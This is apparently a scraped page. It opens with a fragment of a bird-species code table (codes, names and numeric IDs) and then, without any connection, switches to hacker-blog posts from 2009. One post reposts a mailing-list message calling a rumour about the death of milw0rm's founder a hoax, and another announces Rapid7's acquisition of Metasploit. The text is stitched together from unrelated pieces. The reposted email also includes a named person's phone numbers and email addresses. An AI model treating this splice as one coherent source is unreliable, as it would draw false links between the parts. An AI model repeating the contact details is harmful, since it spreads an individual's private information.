[5] euhspa:European House Sparrow:Passer domesticus:EUROPEAN HOUSE SPARROW:PASSER DOMESTICUS:
[6] eulgul:European Little Gull:Larus minutus:EUROPEAN LITTLE GULL:LARUS MINUTUS:11082010301:
[7] euphag:Euphagus sp.:Euphagus:EUPHAGUS SP.:EUPHAGUS:21246059999:
[8] eurbla:Eurasian Blackbird:Turdus merula:EURASIAN BLACKBIRD:TURDUS MERULA:21134100100:
[9] eurbul:Eurasian Bullfinch:Pyrrhula pyrrhula:EURASIAN BULLFINCH:PYRRHULA PYRRHULA:21252070100:
[10] eurcoo:Eurasian Coot:Fulica atra:EURASIAN COOT:FULICA ATRA:10011110100:
[11] eurcor:European Cormorant:Phalacrocorax carbo:EUROPEAN CORMORANT:PHALACROCORAX CARBO:
[12] eurcur:Eurasian Curlew:Numenius arquata:EURASIAN CURLEW:NUMENIUS ARQUATA:11071070700:
[13] eurgol:European Goldfinch:Carduelis carduelis:EUROPEAN GOLDFINCH:CARDUELIS CARDUELIS:21252050800:
[14] eurhob:Eurasian Hobby:Falco subbuteo:EURASIAN HOBBY:FALCO SUBBUTEO:08030020500:

40% to go.. till then.. keep r0x darkc0de!

just make it clear: Milw0rm / str0ke Not Dead !

Milw0rm / Str0ke Not Dead

---

From: Jon Kibler
Date: Wed, 04 Nov 2009 17:07:11 -0500

---

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi,

I know by now that many of you have seen the story at...

http://bl4cksecurity.blogspot.com/2009/11/str0ke-milworms-funeral-is-this-friday.html

I know this because MANY of you have written me off-list with the message "have
you heard the news?"... If I did not personally reply, I am sorry, but my inbox
has been swamped today.

Well, good news and bad news here.

Bad news first. The above story is a hoax. Str0ke is alive, well, and kicking.
Don't feel bad. Many of the best in the industry got taken in by the story. I
fell for it, too -- hook, line, and sinker. Oh well, live and learn.

Now the good news. The folks at OffSec, along with David Kennedy and others, are
talking over milw0rm from stroke. Read the announcement here:
  http://www.offensive-security.com/blog/
I had just talked with Muts yesterday about another issue, and he indicated that
an announcement regarding milw0rm would be coming out soon, but I suspect that
the hoax regarding str0ke and the buzz about inj3ct0r.com may have forced an
early pre-announcement.

I know that milw0rm will be in great hands.

Thanks to all of those that contacted me off-list, too.

Jon
- --
Jon R. Kibler
Chief Technical Officer
Advanced Systems Engineering Technology, Inc.
Charleston, SC  USA
o: 843-849-8214
c: 843-813-2924
s: 843-564-4224
s: JonRKibler
e: Jon.Kibler () aset com
e: Jon.R.Kibler () gmail com
http://www.linkedin.com/in/jonrkibler


article taken from http://seclists.org/pen-test/2009/Nov/25
need proof? http://twitter.com/str0ke/status/5422531377

Metasploit has been acquired by Rapid7

http://blog.metasploit.com/2009/10/metasploit-rising.html
http://www.rapid7.com/metasploit-announcement.jsp

its nice to see the project growing as fast as it as and all of you (HDM,Egypt)/the Metasploit team's hard work paying off. as Zenofox said.

its blooming, rising, and then what? you guess.. hopefully not lyke what u thing jor, aite mate ;-)

"Rapid7 has committed to keeping the project open source, with no plans to change the license or the community development model. What will be changing is how fast we add new exploits, integrate new features, and release new versions. By backing Metasploit, Rapid7 will benefit from the extensive security research experience of the Metasploit team and use this to enhance its existing NeXpose product line."

ok go!